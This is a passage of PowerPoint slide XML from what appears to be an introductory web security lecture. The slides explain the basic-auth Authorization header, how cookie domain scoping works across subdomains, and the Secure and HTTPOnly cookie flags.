              </a:spcAft>
              <a:buSzPts val="2300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>Authorization: Used for ‘basic auth’ pages (mainly). Takes the form “Basic &lt;base64’d username:password&gt;”</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Cookies</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Shape 63"/>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As most of you know, cookies are key-value pairs of data that are sent from the server and reside on the client for a fixed period of time.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Each cookie has a domain pattern that it applies to and they’re passed with each request the client makes to matching hosts.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Cookie Security</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Shape 69"/>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Cookies added for .example.com can be read by any subdomain of example.com</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Cookies added for a subdomain can only be read in that subdomain and its subdomains</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>A subdomain can set cookies for its own subdomains and parent, but it can’t set cookies for sibling domains</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>E.g. test.example.com can’t set cookies on test2.example.com, but can set them on example.com and foo.test.example.com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05978"/>
            <a:ext cx="8229600" cy="11415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Cookie Security</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Shape 75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1460499"/>
            <a:ext cx="8229600" cy="34653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800"/>
              <a:t>There are two important flags to know for cookies:</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800"/>
              <a:t>Secure: The cookie will only be accessible to HTTPS pages</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800"/>
              <a:t>HTTPOnly: The cookie cannot be read by Javascript</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800"/>
              <a:t>The server indicates these flags in the Set-Cookie header that passes them in the first place.</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idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4406309"/>
            <a:ext cx="8229600" cy="519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HTML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